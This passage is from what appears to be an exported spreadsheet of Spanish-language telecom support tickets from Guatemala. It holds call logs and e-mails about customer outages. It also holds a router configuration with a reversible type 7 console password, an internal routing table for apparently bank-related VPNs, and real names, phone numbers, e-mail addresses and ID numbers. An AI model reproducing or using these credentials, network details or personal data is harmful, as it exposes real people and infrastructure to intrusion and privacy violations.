| SI NO TIENE AUTORIZACION PARA INGRESAR AL EQUIPO, POR FAVOR
| CANCELE LA CONEXION INMEDIATAMENTE. EL EQUIPO ESTA SIENDO
| MONITOREADO Y LLEVA REGISTRO DE LAS DIRECCIONES IP Y USUARIOS
| UTILIZADOS PARA LA CONEXION, CUALQUIER ANOMALIA SERA REPORTADA
| A LAS AUTORIDADES CORRESPONDIENTES.
+----------------------------------------------------------------+
^C
!
LINE CON 0
 PASSWORD 7 094F42080B0A
 LOGIN
LINE 1
 MODEM INOUT
 STOPBITS 1
 SPEED 115200
 FLOWCONTROL HARDWARE
LINE AUX 0
LINE VTY 0 4
 PRIVILEGE LEVEL 15
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER MAX-TASK-TIME 5000
END
CSC891_HERMANDAD_LA_ENTRADA_COP_ENTTX_DX6M_ID619468#</t>
  </si>
  <si>
    <t>F4575581</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA PERO NO SE TIENE RESPUESTA
3001060085
COLA:
NOMBRE: A: 51972247
NÚMERO: 55280199
DURACIÓN: 0:00:19
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 30/05/2022 12:20:38
3001060246
COLA:
NOMBRE: A: 51899972
NÚMERO: 55280199
DURACIÓN: 0:00:49
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 30/05/2022 12:22:10</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE, NO SE RECIBE RESPUESTA.
2001434572
COLA:
NOMBRE: A: 25041515
NÚMERO: 25041515
DURACIÓN: 0:01:19
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 25041515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 26/05/2022 16:00:17</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE A LA EXTENSION 077321, PERO NO SE OBTIENE RESPUESTA.
2001429590
COLA:
NOMBRE: A: 25041515
NÚMERO: 25041515
DURACIÓN: 0:01:34
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 25041515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 26/05/2022 15:45:25</t>
  </si>
  <si>
    <t>SE REALIZA LLAMADA NUEVAMENTE A LA AGENCIA EXTENSIÓN 077321 PERO NO SE LOGRA COMUNICACION. || SE DEBE VALIDAR SI UPS SE ENCUENTRA EN BUEN ESTADO
ID
2001222497
COLA:
NOMBRE: A: 25041515
NÚMERO: 25041515
DURACIÓN: 0:01:16
ESTADO: CONECTADA
DETALLES: 25041515
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 25/05/2022 16:47:06</t>
  </si>
  <si>
    <t>F4575584</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FREDY MORALES 56336707 MENCIONA QUE YA TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 1001837581</t>
  </si>
  <si>
    <t>F4575585</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS SOSA  2420 7200 EXT:  	2413 CONFIRMA VISITA PARA EL DIA VIERNES A LAS 15:00 HRS **
ID 2001077898
**</t>
  </si>
  <si>
    <t>****SE LLAMA A CLIENTE CARLOS SOSA  2420 7200 EXT:  2413  CONTESTA EL SEÑOR LUIS CONFIRMA VISITA PARA LAS 15:00  HRS EL DIA DE HOY**
ID 2001496166
**</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL MENCIONAN QUE SE ESTARAN CONTACTANDO CON PERSONAL DE TAVSA PARA VALIDAR EN CUANTO TIEMPO LLEGARAN A PR
-ID 2001648566</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL MENCONA QUE PERSONAL DE TAVSA NO PUEDE APOYAR EL DIA DE HOY POR LO QUE INDICA QUE ESTARAN COMPARTIENDO POR CORREO NUEVA FECHA DE VISITA
ASUNTO: RE: TELECOM 5012
-ID 2001656431</t>
  </si>
  <si>
    <t>F4575588</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA KAREN ALVARADO 46719846 QUIEN VALIDA SERVICIO OPERATIVO Y ESTABLE || AUTORIZA CIERRE DE TIKCET
1001970957
COLA:
NOMBRE: A: 46719846
NÚMERO: 011 50246719846
DURACIÓN: 0:04:24
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50246719846
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 24/05/2022 15:43:14</t>
  </si>
  <si>
    <t>F4575608</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GILBERTO RAMIREZ 54661746 PERO INDICA QUE YA TIENE LLAMADAS SALIENTES, SE PROCEDE AL CIERRE DEL TICKET
1001842218
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 5487
ESTADO: CONECTADA
DURACIÓN: 0:02:15
DETALLES: 5487
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 24/05/2022 09:49:19</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE GILBERTO RAMIREZ 54661746 INDICA QUE NO TIENE LLAMADAS SALIENTES, SE ESTABA COLOCANDO EL TRAZADOR PERO NO CARGABA, SE CORTO LA LLAMADA, SE INTENTO LLAMAR NUEVAMENTE PERO ENVÍA A BUZÓN
1001840887
1001841056
1001841180</t>
  </si>
  <si>
    <t>F4575611</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR GUZMAN-54789867  NOS CONFIRMA QUE EL APERTURO PARA TELEFONIA- NO INTERNET ## FAVOR APERTURAR CON EL ID CORRECTO 90001903536T
1001825379
COLA:
NOMBRE: A: 54789867
NÚMERO: 54789867
DURACIÓN: 0:00:46
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 54789867
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/05/2022 09:06:37</t>
  </si>
  <si>
    <t>F4575623</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICKSON MORALES  24104082 MENCIONA QUE ESTUVIERON REALIZANDO PRUEBAS CON ALGUNOS EQUIPOS INTERNOS POR LO QUE SOLICITA LLAMADA PARA LAS 14:30
-ID 1001901845</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE SE LLAME A LAS 11:30 HORAS PARA VALIDAR SOLICITA DEJARLO EN OBSERVACION--</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERICKSON MORALES  24104082 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001948262</t>
  </si>
  <si>
    <t>F4575625</t>
  </si>
  <si>
    <t>SE LLAMA  CLIENTE ERICKSON MORALES  24104082 MENCIONA QUE EL SERVICIO YA RESTABLECIO PERO SOLICITA LLAMADA PARA LAS 11:30 YA QUE ESTAN PRESENTANDO ALGUNAS CAIDAS
-ID 1001841455</t>
  </si>
  <si>
    <t>F4575627</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ESAU 74569054
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE TIENE UN ASMI 54L EL CUAL ESTA ALARMADO DE LA SIGUIENTE FORMA
PWR - VERDE
TST - APAGADO
SYNC A - VERDE
SYNC B - APAGADO
E1 SYN - APAGADO
ALM  - ROJO
CLIENTE NOS APOYA CON EL REINICIO DE EQUIPO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>PERO NO SE TIENE RESPUESTA, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>DESPUES DEL REINICIO, CLIENTE COMENTA QUE SIGUE EN EL MISMO ESTADO DESPUES DEL REINICIO, SE LE INDICA QUE SE PROCEDERA A COORDINAR PERSONAL TECNICO PARA LA REVISION DE LOS EQUIPOS Y DE LADO DE LA CENTRAL, NO ES NECESARIO TRAMITAR PERMISOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4575629</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EDUARDO REYES 79530168 MENCIONA QUE YA REALIZARON VALIDACIONES INTERNAS PERO EL SERVICIO SIGUE PRESENTANDO INTERMITENCIA
-ID 1001843731 - 1001843879
UBICACIÓN: 7 CALLE PONIENTE ENTRE 77 - 79 AVENIDA NORTE, COLONIA ESCALON CONTIGUO A CLINICA PARA VIDA #4025
CONTACTO EN SITIO: EDUARDO REYES 79530168
HORARIO DE ATENCION:HASTA LAS 18:00 HRS
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4575645</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE JUDITH MATIAS 42958666 PARA REALIZAR PRUEBAS Y VALIDAR EL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE SE ENCUENTRA REALIZANDO PRUEBAS, SOLICITA QUE SE VALIDE EN 1 HR
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4575653</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE VISITA Y ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 8:30
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; BUZAINZ RODRIGUEZ, JEFFREY &lt;J.BUZAINZRODRIGUEZ@DXC.COM&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; OCOX PIRIR, AXEL ANTONIO &lt;A.OCOXPIRIR@DXC.COM&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; MAZARIEGOS GIRON, CARLOS ALBERTO &lt;C.MAZARIEGOSGIRON@DXC.COM&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CASASOLA GRAMAJO, PABLO &lt;PABLO.CASASOLA@COCA-COLA.COM.GT&gt;
CC: CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; GARRO VARGAS, MICHAEL GERARDO &lt;M.GARROVARGAS@DXC.COM&gt;; RODRIGUEZ SEGURA, JEFFRY &lt;J.RODRIGUEZSEGURA@DXC.COM&gt;
ASUNTO: RE: FEMSA | INC23386590 | COCA COLA FEMSA-GUATEMALA-VOLCANES-QUETZALTENANGO-DISTRIBUIDORA LINK CLARO DOWN
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, EN EFECTO SE DEBERÁ DE REALIZAR PRUEBAS EN CONJUNTO. POR LO QUE SE SOLICITA DE SU APOYO EN QUE SE PUEDA CONFIRMAR DE AUTORIZADO EL ACCESO PARA EL PERSONAL DESCRITO A CONTINUACIÓN. A SU VEZ, SE SOLICITA UN CONTACTO DIRECTO, PARA QUE PUEDA ATENDER Y DAR ACCESO A LOS EQUIPOS.
DIEGO EDUARDO ALVAREZ CAHUEX    1887709920901
CAYAX CHAVEZ, OSCAR EFRAIN 2347762500901
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t xml:space="preserve">
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 20:07
PARA: BUZAINZ RODRIGUEZ, JEFFREY &lt;J.BUZAINZRODRIGUEZ@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; OCOX PIRIR, AXEL ANTONIO &lt;A.OCOXPIRIR@DXC.COM&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; MAZARIEGOS GIRON, CARLOS ALBERTO &lt;C.MAZARIEGOSGIRON@DXC.COM&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CASASOLA GRAMAJO, PABLO &lt;PABLO.CASASOLA@COCA-COLA.COM.GT&gt;
CC: CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; GARRO VARGAS, MICHAEL GERARDO &lt;M.GARROVARGAS@DXC.COM&gt;
ASUNTO: RE: FEMSA | INC23386590 | COCA COLA FEMSA-GUATEMALA-VOLCANES-QUETZALTENANGO-DISTRIBUIDORA LINK CLARO DOWN
BUENAS NOCHES SR. BUZAINZ
LE COMENTAMOS QUE SE ENTABLO COMUNICACIÓN CON EL SR. CARLOS MAZARIEGOS AL CONTACTO BRINDADO 32564613, INFORMA QUE EL POR SER TERCERIZADO NO TIENE AUTORIZACIÓN DE BRINDAR ACCESOS A NUESTRO PERSONAL TÉCNICO, NOS BRINDA EL CONTACTO DIRECTO DE COCACOLA PABLO CASASOLA 40852556 PERO NO SE LOGRA RESPUESTA PARA COORDINAR VISITA.
TOMAR EN CUENTA QUE EL ENLACE A NIVEL DE CLARO SE OBSERVA OPERATIVO, PERO LA INTERFAZ
LAN SE OBSERVA DOWN DOWN.</t>
  </si>
  <si>
    <t>**SE LLAMA CLIENTE JEFFREY BUZAINZ RODRIGUEZ AL 41093047 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001286961
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO CASASOLA  AL 40852556  NO RESPONDE, SE INTENTARA LUEGO PARA CONFIRMAR ACCESOS**
ID 2001285939
**</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 10:56
PARA: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;; OCOX PIRIR, AXEL ANTONIO &lt;A.OCOXPIRIR@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; BUZAINZ RODRIGUEZ, JEFFREY &lt;J.BUZAINZRODRIGUEZ@DXC.COM&gt;; CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CARLOS ESTUARDO LEIVA RAMIREZ &lt;CARLOSE.LEIVA@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;; MAZARIEGOS GIRON, CARLOS ALBERTO &lt;C.MAZARIEGOSGIRON@DXC.COM&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CASASOLA GRAMAJO, PABLO &lt;PABLO.CASASOLA@COCA-COLA.COM.GT&gt;
CC: CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; GARRO VARGAS, MICHAEL GERARDO &lt;M.GARROVARGAS@DXC.COM&gt;; RODRIGUEZ SEGURA, JEFFRY &lt;J.RODRIGUEZSEGURA@DXC.COM&gt;
ASUNTO: RE: FEMSA | INC23386590 | COCA COLA FEMSA-GUATEMALA-VOLCANES-QUETZALTENANGO-DISTRIBUIDORA LINK CLARO DOWN
*--*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 506 41093047 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001330601 - 2001331605</t>
  </si>
  <si>
    <t>F4575658</t>
  </si>
  <si>
    <t>**SE LAMA A CLIENTE CRISTIAN RUEDA AL 55583165 INDICA QUE SI CUENTAN CON ENERGIA PERO ESTAN REALIZANDO MODIFICACIONES Y TIENEN DESCONECTADOS LOS EQUIPOS SOLICITA QUE SE LE LLAME A LAS 12:00 HRS **
ID 10001843857
**</t>
  </si>
  <si>
    <t>F4575661</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDITH ALCANTARA 24868001 MENCIONA QUE SI TIENEN LLAMADAS SALIENTES Y ENTRANTES EL PROBLEMA ES QUE AL SACAR LAS LLAMADAS DESDE DICIEMBRE DEL 2021 INICIAN CON EL AUDIO
"DESPUES DEL TONO MARQUE EL NUMERO DESEADO, PERO NO TENEMOS REGISTRADO EL PAGO DE SU FACTURA, AGRADECEMOS MARCAR AL 22505555"
CLIENTE MENCIONA QUE ESTAN AL DIA CON LA FACTURA Y ESE AUDIO LE ATRASA EN LAS LLAMADAS
-ID 1001847693</t>
  </si>
  <si>
    <t>F4575676</t>
  </si>
  <si>
    <t>SE CERTIFICARÁ MEDIO/SERVICIO CON APOYO DE PERSONAL DE PLEX; ADICIONAL SE LLAMÓ HABLÓ CON OSCAR GUZMÁN/CLIENTE 54789867 Y SE LE BRINDAN AVANCES DEL TICKET; ÉSTE INDICA QUE YA TÉCNICOS ESTÁN EN SUS INSTALACIONES.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSCAR GUZMAN  54789867 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001947502</t>
  </si>
  <si>
    <t>F4575678</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE EDY RODRIGUEZ-45905616 INDICA QUE SU PBX SE ESTABA ALARMADA ## APLIARON REINICIO A PBX Y TODO QUEDO OK ## VALIDA CIERRE
1001904010
COLA:
NOMBRE: A: 45905616
NÚMERO: 45905616
DURACIÓN: 0:02:44
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 45905616
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/05/2022 12:26:41</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDY RODRIGUEZ-45905616     CLIENTE INDICA QUE SE LE DEVUELVA LA LLAMDA EN 1 HORA POR QUE NO HA PODIDO VERIFICAR ##
1001857868
COLA:
NOMBRE: A: 45905616
NÚMERO: 45905616
DURACIÓN: 0:00:05
ESTADO: MARCANDO
DETALLES: 45905616
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/05/2022 10:26:25</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ESTA VERIFICANDO SU PBX ## COMNTA SE LE LLAME EN 40 MINUTOS ###DEBIDO A QUE ESTA VERIFICANDO Y REINICIANDO SU PLANTA
1001882254
COLA:
NOMBRE: A: 45905616
NÚMERO: 45905616
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 45905616
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 24/05/2022 11:26:08</t>
  </si>
  <si>
    <t>CLEINTE PIDE SE LE DEVUELVA LA LLAMADA EN 30 MINUTOS ##</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE EDY RODRIGUEZ-45905616 INDICA QUE LO QUE ESTA REPORTANDO ES INTERMITENCIA Y MENCIONA INTERMITENCIA EN EQUIPOS-Y  TAMBIEN QUE HAY LUCES INTERMITENTES- SE LE COMENTA QUE NORMALMENTE LOS EQUIPOS E1 TIENEN LUCES VERDES QUE SE APAGAN Y SE ENCIENDEN EN SEGUNDOS Y ESO ES NORMAL ## CLIENTE INDICA QUE VERIFICARA MAS A FONDO EL REPORTE - POR QUE SU JEFE FUE EL QUE PIDIO QUE SE REALIZARA ##
RESULTADO: LLAMADA HECHA
NOMBRE: 45905616
NÚMERO: 45905616
INICIO: HOY, 10:01
FIN: HOY, 10:03
DURACIÓN: 2:27
ID DE LLAMADA: 1001847834</t>
  </si>
  <si>
    <t>F4575681</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DAVID CAMBRIZ - 50506237 PERO ENVIA DIRECTO A BUZON
-ID 1001984343</t>
  </si>
  <si>
    <t>SE LLAMA AL CL DAVID CAMBRIZ AL 50506237  ID 1001995427 / 1001995534 / 1001995615 /  1001995764 SE LE BRINDA LA INFORMACIÓN SEGÚN CRONOLÓGICA,  COMENTA QUE DESCONOCE ESTA FISCALIA YA QUE EN QUICHE HAY VARIOS  Y DE MOMENTO EN QUICHE NO VE ALGUNA FISCALIA CIADA POR LO QUE SE E LLAMA A EL PR QUE BRINDO EL CL CON RODOLFO  URIZAR AL 46240171   ID 1001996626 SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE TAMBIEN VE TODO OPERATIVO Y CONFIRMA QUE SE PROCEDA CON EL CIERRE DE LA FALLA Y VALIDAR EL CIERRE DEL TICKET CON LA SD Y SOLICITA DETALLES A QUE FISCALIA EXACTAMENTE PRESENTA LA CAIDA. SE NOTIFICA AL GESTOR WAGNER.POLANCO EL CIERRE DE LA FALLA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RODOLFO JAVIER URIZAR 46240171 MENCIONA QUE NO HA RECIBIDO NINGUNA LLAMADA DE CLARO EL DIA DE HOY PERO BRINDA CONTACTO DAVID CAMBRIZ - 50506237
-ID 1001983427</t>
  </si>
  <si>
    <t>F4575687</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN ISRAEL FUENTES 49872286 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001904167</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELVIN ISRAEL FUENTES RAMÍREZ AL 49872286 NO RESPONDE SE INTENTARA LUEGO   **
ID 1001882726
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELVIN ISRAEL FUENTES RAMÍREZ AL 49872286 INDICA QUE LO VEN UN POCO LENTO SOLICITA QUE SE DEJE EN OBSERVACION 1 HR  **
ID 1001855370
**</t>
  </si>
  <si>
    <t>F4575695</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS ROBLES 58794781 MENCIONA QUE VALIDARA CON PR POR LO QUE SOLICITA LLAMADA 1 HORA
-ID 1001852881</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JUAN CARLOS ROBLES 58794781 MENCIONA QUE AUN NO HA PODIDO VALIDAR POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 1001881718</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS ROBLES 58794781 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001887765</t>
  </si>
  <si>
    <t>F4575706</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR RENATO RIOS ARQUETA AL 5806 4113 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
ID 1001883495
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR RENATO RIOS ARQUETA AL 5806 4113 CLIENTE SOLICITA QUE SE LE LLAME EN 10 MIN **
ID 1001876544
**</t>
  </si>
  <si>
    <t>F4575709</t>
  </si>
  <si>
    <t>SE VALIDA QUE NO HAY NADA PENDIENTES POR EL CLIENTE Y ESTA EN PC DESDE EL HORARIO  24/05/2022 12:14:22  SE CAMBIA A WIP YA QUE NO APLICA DEBIDO A QUE YA HAY INFORMACIÓN DEL INCONVENIENTE Y NO HAY LLAMADAS O CORREOS CON EL SEGUIMIENTO, SE NOTIFICA VÍA SKYPE AL GESTOR ALEJANDRO.NAVARRO PARA EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY ESCOBAR AL 47409160  NO RESPONDE, SE INTENTARA LUEGO **
ID 1001885479
**</t>
  </si>
  <si>
    <t>F4575711</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SUANI ALVAREZ AL 40580807  -INDICA QUE AUN SIGUE MUY INESTABLE EL SERVICIO QUE A CADA RATO SE LE CAE LA SEÑAL || SE NOTIFICA A A GESTOR **
ID 1001889305
**</t>
  </si>
  <si>
    <t>F4575719</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EVELYN 89296118 QUIEN SOLICITA LLAMADA EN 5 MIN
-ID 1001977082 - 1001977986</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  EVELYN 89296118 MENCIONA QUE ESTARA EN PR ESPERANDO A PERSONAL TECNICO
-ID 1001981690</t>
  </si>
  <si>
    <t>F4575728</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON STURBAN AL 23828900 INDICA QUE NO AUN SIGUE INESTABLE EL SERVICIO QUE AUN TIENE PERDIDAS || SE NOTIFICA A GESTOR **
ID 1001894134
**</t>
  </si>
  <si>
    <t>F4575735</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE SR. FÉLIX DOMÍNGUEZ 2238-7200 EXT. 1266 ,66422 PERO NO CONTESTA, SE NECESITA VALIDAR ENLACE O CONSULTAR MAYOR DATOS YA QUE NI LA DIRECCION ESTA EN EL INCIDENTE:
L3: 10.179.32.22
&lt;FDCEHNGJN1D1EIM3&gt;DISP CURR | IN 192.168.33
INFO: IT WILL TAKE A LONG TIME IF THE CONTENT YOU SEARCH IS TOO MUCH OR THE STRING YOU INPUT IS TOO LONG, YOU CAN PRESS CTRL_C TO BREAK.
 IP ADDRESS 192.168.33.1 255.255.255.252
 IP ADDRESS 192.168.33.6 255.255.255.248
 IP ADDRESS 192.168.33.14 255.255.255.248
IP ROUTE-STATIC VPN-INSTANCE SERCOMBANCOS 10.138.155.0 255.255.255.0 192.168.33.10 DESCRIPTION SERCOM_BAN_CREDOM
IP ROUTE-STATIC VPN-INSTANCE SERCOMBANCOS 128.100.0.3 255.255.255.255 192.168.33.10 DESCRIPTION SERCOM_BAN_CREDOM
IP ROUTE-STATIC VPN-INSTANCE SERCOMBANCOS 172.16.2.28 255.255.255.255 192.168.33.9 DESCRIPTION SERCOM_BAN_CREDOM
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.1.100.100 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.100.1.67 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.100.21.3 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.100.21.4 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.100.101.48 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.100.101.58 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.100.101.141 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.100.101.151 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
IP ROUTE-STATIC VPN-INSTANCE RECARGAS_BAC 10.100.101.199 255.255.255.255 192.168.33.2 DESCRIPTION SRV-BAC
